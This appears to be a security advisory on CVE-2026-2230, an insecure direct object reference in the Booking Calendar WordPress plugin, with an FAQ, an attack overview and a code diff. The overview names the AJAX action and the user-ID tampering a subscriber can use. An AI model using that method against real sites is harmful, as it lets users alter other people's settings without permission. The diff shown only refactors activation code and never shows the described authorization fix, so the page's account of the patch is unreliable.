What is CVE-2026-2230?

CVE-2026-2230 is a vulnerability in the Booking Calendar plugin for WordPress that allows authenticated users with Subscriber-level access and above to modify other users’ settings. This is due to an Insecure Direct Object Reference (IDOR) in the handle_ajax_save function, which lacks proper validation.

How does CVE-2026-2230 work?

The vulnerability allows attackers to send crafted AJAX requests to the admin-ajax.php endpoint, specifying arbitrary user IDs to modify settings. Since the function does not verify if the current user has permission to change the targeted user’s settings, this can lead to unauthorized modifications.

Who is affected by this vulnerability?

All users of the Booking Calendar plugin versions up to and including 10.14.14 are affected. Specifically, authenticated users with Subscriber-level access and booking permissions granted by an Administrator can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Booking Calendar plugin you are using. If it is version 10.14.14 or earlier, your site is at risk. Additionally, review user roles and permissions to assess potential exposure.

How can I fix CVE-2026-2230?

To fix this vulnerability, update the Booking Calendar plugin to version 10.14.15 or later, where the issue has been patched. Ensure that all users have appropriate permissions and review user roles to minimize exposure.

What does the CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access or data modification if exploited.

What are the practical risks of this vulnerability?

The practical risks include unauthorized modifications to booking settings, which can disrupt the booking calendar functionality for targeted users. This may affect business operations by making the booking system unusable for specific users.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted AJAX request to modify another user’s settings. It shows the steps involved in authentication and the manipulation of user IDs.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider restricting user permissions for Subscriber-level users or disabling the Booking Calendar plugin temporarily until a patch can be applied. Monitor user activities for any unauthorized changes.

Are there any long-term implications of this vulnerability?

Long-term implications include potential data integrity issues and user trust concerns if unauthorized modifications are made. Regularly updating plugins and reviewing user permissions are essential practices to mitigate future vulnerabilities.

How does the patch for CVE-2026-2230 work?

The patch for CVE-2026-2230 adds proper authorization checks in the handle_ajax_save function. It ensures that the current user can only modify their own settings or has appropriate administrative privileges, preventing unauthorized changes.

What is Insecure Direct Object Reference (IDOR)?

Insecure Direct Object Reference (IDOR) is a type of security vulnerability that occurs when an application exposes a reference to an internal object, allowing attackers to access or modify data they should not have permission to. It often arises from insufficient authorization checks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2230: Booking Calendar <= 10.14.14 – Insecure Direct Object Reference to Authenticated (Subscriber+) Arbitrary User Settings Modification (booking)

CVE ID CVE-2026-2230

Plugin booking

Severity Medium (CVSS 4.3)

CWE 639

Vulnerable Version 10.14.14

Patched Version 10.14.15

Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2230:
This vulnerability is an Insecure Direct Object Reference (IDOR) in the Booking Calendar WordPress plugin. The flaw allows authenticated attackers with Subscriber-level access and booking permissions to modify other users’ plugin settings. The vulnerability affects all plugin versions up to and including 10.14.14, with a CVSS score of 4.3.

Atomic Edge research identifies the root cause in the handle_ajax_save function. The function processes AJAX requests to save user settings but lacks proper validation on a user-controlled key parameter. This missing validation allows attackers to specify arbitrary user IDs when modifying plugin settings. The vulnerability exists because the function does not verify that the current user has permission to modify the targeted user’s settings.

The exploitation method involves authenticated attackers sending crafted AJAX requests to the WordPress admin-ajax.php endpoint. Attackers must have Subscriber-level access and booking permissions granted by an Administrator. The attack vector uses the wp_ajax_wpbc_ajax_save_user_settings action with a manipulated user ID parameter. By changing this parameter, attackers can target other users’ settings, such as booking calendar display options.

The patch adds proper authorization checks before processing save requests. The fix validates that the current user can only modify their own settings or has appropriate administrative privileges. The patch modifies the handle_ajax_save function to compare the requested user ID with the current user’s ID and verify permissions. This prevents unauthorized modification of other users’ settings while maintaining legitimate functionality.

Successful exploitation allows attackers to disrupt booking calendar functionality for targeted users. Attackers can modify display settings, potentially hiding booking interfaces or changing calendar behavior. This could impact business operations by making booking systems unusable for specific users. The vulnerability does not directly lead to privilege escalation or remote code execution, but it enables unauthorized data modification that can cause service disruption.

Differential between vulnerable and patched code

Code Diff

--- a/booking/core/wpbc-activation.php
+++ b/booking/core/wpbc-activation.php
@@ -56,31 +56,32 @@
 		return $links;

     }
-
-    /** Check if was updated from lower to  high version */
-    public function is_update_from_lower_to_high_version() {
-
-        $is_make_activation = false;

-	    // Check  conditions for different version about Upgrade
-	    if ( ( class_exists( 'wpdev_bk_personal' ) ) && ( ! wpbc_is_table_exists( 'bookingtypes' ) ) ) {
-		    $is_make_activation = true;
-	    }
-	    if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_s' ) ) && ( wpbc_is_field_in_table_exists( 'booking', 'pay_request' ) == 0 ) ) {
-		    $is_make_activation = true;
-	    }
-	    																									// FixIn: 9.9.0.13.
-	    if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_m' ) ) && ( ! wpbc_is_table_exists( 'booking_seasons' ) ) ) {
-		    $is_make_activation = true;
-	    }
-	    if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_l' ) ) && ( ! wpbc_is_table_exists( 'booking_coupons' ) ) ) {
-		    $is_make_activation = true;
-	    }
-	    if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_multiuser' ) ) && ( wpbc_is_field_in_table_exists( 'booking_coupons', 'users' ) == 0 ) ) {
-		    $is_make_activation = true;
-	    }
-        return $is_make_activation;
-    }
+	/** Check if was updated from lower to  high version */
+	public function is_update_from_lower_to_high_version() {
+
+		$is_make_activation = false;
+
+		// Check  conditions for different version about Upgrade
+		if ( ( class_exists( 'wpdev_bk_personal' ) ) && ( ! wpbc_is_table_exists( 'bookingtypes' ) ) ) {
+			$is_make_activation = true;
+		}
+		if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_s' ) ) && ( wpbc_is_field_in_table_exists( 'booking', 'pay_request' ) == 0 ) ) {
+			$is_make_activation = true;
+		}
+		// FixIn: 9.9.0.13.
+		if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_m' ) ) && ( ! wpbc_is_table_exists( 'booking_seasons' ) ) ) {
+			$is_make_activation = true;
+		}
+		if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_biz_l' ) ) && ( ! wpbc_is_table_exists( 'booking_coupons' ) ) ) {
+			$is_make_activation = true;
+		}
+		if ( ( ! $is_make_activation ) && ( class_exists( 'wpdev_bk_multiuser' ) ) && ( wpbc_is_field_in_table_exists( 'booking_coupons', 'users' ) == 0 ) ) {
+			$is_make_activation = true;
+		}
+
+		return $is_make_activation;
+	}

 }

@@ -198,7 +199,7 @@
     // Options
 	// -----------------------------------------------------------------------------------------------------------------
     $default_options_to_add = wpbc_get_default_options();
-
+	// TODO: for Import / Export options,  we can  use this function to get all option_names and then just  get  the real  values from  the wp_options table.
     make_bk_action( 'wpbc_before_activation__add_options', $default_options_to_add );           // FixIn: 9.6.2.11.

     foreach ( $default_options_to_add as $default_option_name => $default_option_value ) {
@@ -210,92 +211,139 @@
     // DB Tables
 	// -----------------------------------------------------------------------------------------------------------------
     if ( true ){
-        global $wpdb;
-        $charset_collate = '';
-        //if ( $wpdb->has_cap( 'collation' ) ) {
-            if ( ! empty($wpdb->charset) ) $charset_collate = "DEFAULT CHARACTER SET $wpdb->charset";
-            if ( ! empty($wpdb->collate) ) $charset_collate .= " COLLATE $wpdb->collate";
-        //}
-
-        $wp_queries = array();
-        if ( ! wpbc_is_table_exists('booking') ) { // Check if tables not exist yet
-// FixIn: 10.0.0.1.
-            $simple_sql = "CREATE TABLE {$wpdb->prefix}booking (
-                     booking_id bigint(20) unsigned NOT NULL auto_increment, " .
-					 /*
-				   " booking_options TEXT,
-					 trash bigint(10) NOT NULL default 0,
-					 is_new bigint(10) NOT NULL default 1,
-					 sort_date datetime,
-					 modification_date datetime,
-					 creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
-					 status varchar(200) NOT NULL default '',
-					 sync_gid varchar(200) NOT NULL default '',
-					 is_trash datetime,
-					 hash TEXT, " .  /**/
-
-				   " form text ,
-                     booking_type bigint(10) NOT NULL default 1,
-                     PRIMARY KEY  (booking_id)
-                    ) {$charset_collate};";
+
+		global $wpdb;
+
+		// ----------------------------------------------------------------------------
+		// Charset / Collation
+		// ----------------------------------------------------------------------------
+		$charset_collate = '';
+		if ( ! empty( $wpdb->charset ) ) {
+			$charset_collate = "DEFAULT CHARACTER SET {$wpdb->charset}";
+		}
+		if ( ! empty( $wpdb->collate ) ) {
+			$charset_collate .= " COLLATE {$wpdb->collate}";
+		}
+
+		// ----------------------------------------------------------------------------
+		// Table name
+		// ----------------------------------------------------------------------------
+		$table_name = $wpdb->prefix . 'booking';
+
+		// ----------------------------------------------------------------------------
+		// Queries queue for upgrades only
+		// ----------------------------------------------------------------------------
+		$wp_queries = array();
+
+		// ----------------------------------------------------------------------------
+		// 1) First install: CREATE booking TABLE.
+		// ----------------------------------------------------------------------------
+		if ( ! wpbc_is_table_exists( 'booking' ) ) {
+
+			$create_sql = "CREATE TABLE {$table_name} (
+							booking_id bigint(20) unsigned NOT NULL auto_increment,
+							booking_type bigint(10) NOT NULL default 1,
+
+							form TEXT,
+							hash TEXT,
+							booking_options TEXT,
+							status varchar(200) NOT NULL default '',
+
+							is_new bigint(10) NOT NULL default 1,
+							sync_gid varchar(200) NOT NULL default '',
+							trash bigint(10) NOT NULL default 0,
+							is_trash datetime,
+
+							sort_date datetime,
+							modification_date datetime,
+							creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
+
+							PRIMARY KEY  (booking_id)
+						) {$charset_collate};";
+
 			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-			$wpdb->query( $simple_sql );
-        } elseif  (wpbc_is_field_in_table_exists('booking','form') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN form TEXT";   // FixIn: 10.12.1.5.
-        }
+			$wpdb->query( $create_sql );

-        if  (wpbc_is_field_in_table_exists('booking','modification_date') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN modification_date datetime"; // FixIn: 10.12.1.5.
-        }
+			// ----------------------------------------------------------------------------
+			// 2) Upgrade path: only add missing columns (your current logic)
+			// ----------------------------------------------------------------------------
+		} else {

-		// FixIn: 9.2.3.3.
-	    if ( wpbc_is_field_in_table_exists( 'booking', 'creation_date' ) == 0 ) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP";   // FixIn: 10.12.1.5.
-			/**
-			 *
-			// Can be only  one 'TIMESTAMP' field at  some servers.
-			//													   ADD COLUMN re_create_date TIMESTAMP NOT NULL DEFAULT 0
-			//$wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP";
-			 */
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'form' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN form TEXT";
+			}

-        if  (wpbc_is_field_in_table_exists('booking','sort_date') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN sort_date datetime";  // FixIn: 10.12.1.5.
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'modification_date' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN modification_date datetime";
+			}

-        if  (wpbc_is_field_in_table_exists('booking','status') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN status varchar(200) NOT NULL default ''";  // FixIn: 10.12.1.5.
-        }
+			// FixIn: 9.2.3.3.
+			if ( wpbc_is_field_in_table_exists( 'booking', 'creation_date' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN creation_date TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP";
+			}

-        if  (wpbc_is_field_in_table_exists('booking','is_new') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN is_new bigint(10) NOT NULL default 1";   // FixIn: 10.12.1.5.
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'sort_date' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN sort_date datetime";
+			}

-        // Version: 5.2 - Google ID of the booking for Sync functionality
-        if  (wpbc_is_field_in_table_exists('booking','sync_gid') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN sync_gid varchar(200) NOT NULL default ''";  // FixIn: 10.12.1.5.
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'status' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN status varchar(200) NOT NULL default ''";
+			}

-	    // FixIn: 9.2.3.5.
-        if  (wpbc_is_field_in_table_exists('booking','is_trash') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN is_trash datetime";  // FixIn: 10.12.1.5.
-        }
+			if ( wpbc_is_field_in_table_exists( 'booking', 'is_new' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN is_new bigint(10) NOT NULL default 1";
+			}

-        // FixIn: 6.1.1.10.
-        if  (wpbc_is_field_in_table_exists('booking','trash') == 0) {
-            $wp_queries[]  = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN trash bigint(10) NOT NULL default 0";  // FixIn: 10.12.1.5.
-        }
+			// Version: 5.2 - Google ID for Sync
+			if ( wpbc_is_field_in_table_exists( 'booking', 'sync_gid' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN sync_gid varchar(200) NOT NULL default ''";
+			}

+			// FixIn: 9.2.3.5.
+			if ( wpbc_is_field_in_table_exists( 'booking', 'is_trash' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN is_trash datetime";
+			}
+
+			// FixIn: 6.1.1.10.
+			if ( wpbc_is_field_in_table_exists( 'booking', 'trash' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN trash bigint(10) NOT NULL default 0";
+			}
+
+			// FixIn: 9.1.2.12.
+			if ( wpbc_is_field_in_table_exists( 'booking', 'booking_options' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN booking_options TEXT";
+			}

+			if ( wpbc_is_field_in_table_exists( 'booking', 'hash' ) == 0 ) {
+				$wp_queries[] = "ALTER TABLE {$table_name} ADD COLUMN hash TEXT";
+
+				// Update hash  value only in last 100 bookings.
+				$sql_check_table = "SELECT booking_id as id FROM {$wpdb->prefix}booking  ORDER BY booking_id DESC LIMIT 0, 100";
+
+				$res = $wpdb->get_results( $sql_check_table );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+				foreach ( $res as $l ) {
+					$wp_queries[] = "UPDATE {$wpdb->prefix}booking SET hash = MD5('" . time() . '_' . wp_rand( 1000, 1000000 ) . "') WHERE booking_id = " . $l->id;  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+				}
+			}
+		}
+
+		// ----------------------------------------------------------------------------
+		// Execute queued upgrade queries (only runs on upgrades, not new install)
+		// ----------------------------------------------------------------------------
+		if ( ! empty( $wp_queries ) ) {
+			foreach ( $wp_queries as $sql ) {
+				// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+				$wpdb->query( $sql );
+			}
+		}

-	    // FixIn: 9.1.2.12.
-	    if ( wpbc_is_field_in_table_exists( 'booking', 'booking_options' ) == 0 ) {
-		    $wp_queries[] = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN booking_options TEXT";  // FixIn: 10.12.1.5.
-	    }

 		$is_insert_test_bookings = false;

-		// FixIn: 8.7.9.1.
+		// ----------------------------------------------------------------------------
+		// 2. Install: CREATE bookingdate TABLE.
+		// ----------------------------------------------------------------------------
+
 		if ( ! wpbc_is_table_exists( 'bookingdates' ) ) {
 			// Check if tables not exist yet.
 			$simple_sql = "CREATE TABLE {$wpdb->prefix}bookingdates (
@@ -322,101 +370,73 @@
 			$wpdb->query( $simple_sql );
 		}

-
-		if ( count( $wp_queries ) > 0 ) {
-			foreach ( $wp_queries as $wp_q ) {
-				// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-				$wpdb->query( $wp_q );
-			}
-
-			if ( $is_insert_test_bookings ) {
-				// -- Test Booking #1 --
-				$is_appr    = 1;
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date ) VALUES (
-                     'text^name1^John~text^secondname1^Smith~text^email1^example-free@wpbookingcalendar.com~text^phone1^458-77-77~textarea^details1^This is a test booking showing booking for several days.', " . wpbc_sql_date_math_expr_explicit('', 'now') . " );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-				$temp_id        = $wpdb->insert_id;
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved  ) VALUES
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 2 DAY", 'curdate' ) . " ," . $is_appr . "  ),
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 3 DAY", 'curdate' ) . " ," . $is_appr . "  ),
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 4 DAY", 'curdate' ) . " ," . $is_appr . "  );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-				// -- Test Booking #2 --
-				$is_appr    = 0;
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date ) VALUES (
-                     'text^name1^Emma~text^secondname1^Robinson~text^email1^example-free@wpbookingcalendar.com~text^phone1^999-77-77~textarea^details1^This is a test booking showing booking for several days.', " . wpbc_sql_date_math_expr_explicit('', 'now') . " );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-				$temp_id        = $wpdb->insert_id;
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved  ) VALUES
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 28 DAY", 'curdate' ) . " ," . $is_appr . "  ),
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 29 DAY", 'curdate' ) . " ," . $is_appr . "  ),
-                        ( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 30 DAY", 'curdate' ) . " ," . $is_appr . "  );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-
-				// -- Test Booking #3 --
-				$is_appr    = 1;
-				$start_time = '10:00';
-				$end_time   = '10:30';
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date, is_new ) VALUES (
-                     'selectbox^rangetime1^".$start_time." - ".$end_time."~text^name1^Sophia~text^secondname1^Robinson~text^email1^example-free@wpbookingcalendar.com~text^phone1^458-77-77~textarea^details1^This is a test booking showing a one day time slot booking.', " . wpbc_sql_date_math_expr_explicit('', 'now') . ", 0 );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-				$temp_id = $wpdb->insert_id;
-
-				$start_time_arr = explode( ':', $start_time );
-				$end_time_arr   = explode( ':', $end_time );
-				$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved ) VALUES
-									( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL '" . ( ( 8 * 24 ) + intval( $start_time_arr[0] ) ) . ':' . $start_time_arr[1] . ":01' HOUR_SECOND", 'curdate' ) . " ," . $is_appr . " ),
-									( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL '" . ( ( 8 * 24 ) + intval( $end_time_arr[0]   ) ) . ':' . $end_time_arr[1]   . ":02' HOUR_SECOND", 'curdate' ) . " ," . $is_appr . "  );";
-				$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-
-
-			}
-		}
-
-	    // FixIn: 9.2.3.3.
-		if ( wpbc_is_field_in_table_exists( 'booking', 'hash' ) == 0 ) {  //HASH_EDIT
-
-			$simple_sql = "ALTER TABLE {$wpdb->prefix}booking ADD COLUMN hash TEXT";   // FixIn: 10.12.1.5.
-			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-			$wpdb->query( $simple_sql );
-
-			// Update hash  value only in last 100 bookings
-			$sql_check_table = "SELECT booking_id as id FROM {$wpdb->prefix}booking  ORDER BY booking_id DESC LIMIT 0, 100";
-
-			// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-			$res = $wpdb->get_results( $sql_check_table );
-
-			foreach ( $res as $l ) {
-				// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
-				$wpdb->query( "UPDATE {$wpdb->prefix}booking SET hash = MD5('" . time() . '_' . wp_rand( 1000, 1000000 ) . "') WHERE booking_id = " . $l->id );
-			}
+		// ----------------------------------------------------------------------------
+		// 3. Insert test bookings.
+		// ----------------------------------------------------------------------------
+
+		if ( $is_insert_test_bookings ) {
+			// -- Test Booking #1 --
+			$is_appr    = 1;
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date ) VALUES (
+				 'text^name1^John~text^secondname1^Smith~text^email1^example-free@wpbookingcalendar.com~text^phone1^458-77-77~textarea^details1^This is a test booking showing booking for several days.', " . wpbc_sql_date_math_expr_explicit('', 'now') . " );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+			$temp_id        = $wpdb->insert_id;
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved  ) VALUES
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 2 DAY", 'curdate' ) . " ," . $is_appr . "  ),
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 3 DAY", 'curdate' ) . " ," . $is_appr . "  ),
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 4 DAY", 'curdate' ) . " ," . $is_appr . "  );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+			// -- Test Booking #2 --
+			$is_appr    = 0;
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date ) VALUES (
+				 'text^name1^Emma~text^secondname1^Robinson~text^email1^example-free@wpbookingcalendar.com~text^phone1^999-77-77~textarea^details1^This is a test booking showing booking for several days.', " . wpbc_sql_date_math_expr_explicit('', 'now') . " );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+			$temp_id        = $wpdb->insert_id;
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved  ) VALUES
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 28 DAY", 'curdate' ) . " ," . $is_appr . "  ),
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 29 DAY", 'curdate' ) . " ," . $is_appr . "  ),
+					( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL 30 DAY", 'curdate' ) . " ," . $is_appr . "  );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+
+			// -- Test Booking #3 --
+			$is_appr    = 1;
+			$start_time = '10:00';
+			$end_time   = '10:30';
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}booking ( form, modification_date, is_new ) VALUES (
+				 'selectbox^rangetime1^".$start_time." - ".$end_time."~text^name1^Sophia~text^secondname1^Robinson~text^email1^example-free@wpbookingcalendar.com~text^phone1^458-77-77~textarea^details1^This is a test booking showing a one day time slot booking.', " . wpbc_sql_date_math_expr_explicit('', 'now') . ", 0 );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
+
+			$temp_id = $wpdb->insert_id;
+
+			$start_time_arr = explode( ':', $start_time );
+			$end_time_arr   = explode( ':', $end_time );
+			$wp_queries_sub = "INSERT INTO {$wpdb->prefix}bookingdates ( booking_id, booking_date, approved ) VALUES
+								( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL '" . ( ( 8 * 24 ) + intval( $start_time_arr[0] ) ) . ':' . $start_time_arr[1] . ":01' HOUR_SECOND", 'curdate' ) . " ," . $is_appr . " ),
+								( " . $temp_id . ", " . wpbc_sql_date_math_expr_explicit( "+ INTERVAL '" . ( ( 8 * 24 ) + intval( $end_time_arr[0]   ) ) . ':' . $end_time_arr[1]   . ":02' HOUR_SECOND", 'curdate' ) . " ," . $is_appr . "  );";
+			$wpdb->query( $wp_queries_sub );  // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared, PluginCheck.Security.DirectDB.UnescapedDBParameter
 		}
     }
-    make_bk_action( 'wpbc_free_version_activation' );            													// FixIn: 9.3.1.2.
+
+	make_bk_action( 'wpbc_free_version_activation' );

 	// -----------------------------------------------------------------------------------------------------------------
-    // Other versions Activation
+	// Other versions Activation
 	// -----------------------------------------------------------------------------------------------------------------
-    make_bk_action( 'wpbc_other_versions_activation' );
+	make_bk_action( 'wpbc_other_versions_activation' );

-
-    //wpbc_pro_set_default_initial_values();
-
-	// -----------------------------------------------------------------------------------------------------------------
-    wpbc_reindex_booking_db();
+	wpbc_reindex_booking_db();

-    make_bk_action( 'wpbc_after_activation' );
+	make_bk_action( 'wpbc_after_activation' );
 }
 add_bk_action( 'wpbc_activation',  'wpbc_booking_activate' );



-// Deactivate
+// Deactivate.
 function wpbc_booking_deactivate() {

 	// -----------------------------------------------------------------------------------------------------------------
@@ -530,7 +550,7 @@
  $mu_option4delete[]='booking_is_use_autofill_4_logged_user';

 if ( defined( 'WPBC_NEW_FORM_BUILDER' ) && WPBC_NEW_FORM_BUILDER ) {
-	$default_options['booking_use_bfb_form'] = 'Off';
